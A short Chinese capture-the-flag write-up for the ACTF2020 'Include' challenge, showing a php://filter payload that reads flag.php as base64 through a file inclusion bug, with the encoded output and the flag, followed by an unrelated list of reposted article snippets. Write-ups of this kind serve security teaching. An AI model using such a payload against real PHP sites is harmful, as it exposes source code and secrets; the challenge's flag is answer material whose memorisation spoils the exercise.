[ACTF2020 新生赛]Include (文件包含漏洞)

news/2024/11/19 12:17:10/

打开题目:

就一个tips

看看源码:

奥,file=flag.php

而且再看题目:include

应该是文件包含漏洞,是一道php伪协议题目

-.-PHP伪协议-.-:

我们通过 php://filter 来获取源码:
构造payload:
 

​​​​​​​?file=php://filter/read=convert.base64-encode/resource=flag.php

就可以得到base64编码后的flag.php:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7N2M3MTA2NjMtYzllZi00YjBlLWI2ODctZTRjNjU5YTdiODE2fQo=

利用 CyberChef 进行解码:

得到flag.php的内容:

即可得到flag。


http://www.ppmy.cn/news/1273579.html

相关文章

上海亚商投顾:沪指冲高回落 医药医疗股全线下挫

上海亚商投顾前言:无惧大盘涨跌,解密龙虎榜资金,跟踪一线游资和机构资金动向,识别短期热点和强势个股。 一.市场情绪 沪指12月15日高开低走,深成指、创业板指冲高回落,科创50指数跌近1%。医药股全线下挫&a…

Eolink Apikit 如何进行 Websocket 接口测试?

什么是 websocket ? WebSocket 是 HTML5 下一种新的协议(websocket协议本质上是一个基于 tcp 的协议)。 它实现了浏览器与服务器全双工通信,能更好的节省服务器资源和带宽并达到实时通讯的目的 Websocket 是一个持久化的协议。…

RabbitMQ插件详解:rabbitmq_recent_history_exchange【RabbitMQ 七】

欢迎来到我的博客,代码的世界里,每一行都是一个故事 [TOC](rabbitmq_recent_history_exchange) ## 前言 RabbitMQ作为一款强大的消息中间件,提供了许多有趣且功能强大的插件。其中,rabbitmq_recent_history_exchange插件以其独特…

晚期食管癌肿瘤治疗线程分类

文章目录 1、肿瘤治疗的线数1.1 基础概念1.2 线程定义1.3 如何计算治疗线数 2 食管癌治疗指南2.1 食管癌诊疗指南2.1 CSCO 本文前半部分主要来源于参考文件1,其余部分来源于官方指南。无原创内容,全部为摘要。 1、肿瘤治疗的线数 1.1 基础概念 抗肿瘤药…

《微信小程序开发从入门到实战》学习四十九

4.5 实现投票小程序服务端功能 4.5.2 完成获取投票信息功能 修改pages/vote/vote.js文件中getVoteDataFromServer函数,代码如下: getVoteDataFromServer(voteID) { const db wx.cloud.database() db.collection(votes).doc(voteID).get().then(res &…

屏幕超时休眠-Android13

屏幕超时休眠-Android13 1、设置界面1.2 属性值1.2.1 默认值1.2.2 最小值限制 1.3 属性值疑问 Settings.System.SCREEN_OFF_TIMEOUT 2、超时灭屏2.1 锁定屏幕的超时2.2 屏幕灭屏的超时 3、永不休眠* 关键日志 1、设置界面 packages/apps/Settings/src/com/android/settings/dis…

机器视觉技术与应用实战(Chapter Two-03)

2.5 图像滤波和增强 滤波的作用是:图像中包含需要的信息,也包含我们不感兴趣或需要屏蔽的干扰,去掉这些干扰需要使用滤波。 增强的作用是:通过突出或者抑制图像中某些细节,减少图像的噪声,增强图像的视觉效…

【数学建模美赛M奖速成系列】报名流程与论文的基本格式

数学建模美赛M奖速成系列 写在前面报名方式1.官网直接报名2.赛氪软件辅助报名 论文的基本格式摘要模型建立模型求解结果分析与检验模型评价 竞赛的基本注意事项1. 选题后查找资料2. 写作能力和编程能力 历年优秀论文标题与摘要简明扼要善用图表 最后 写在前面 最近&#xff0c…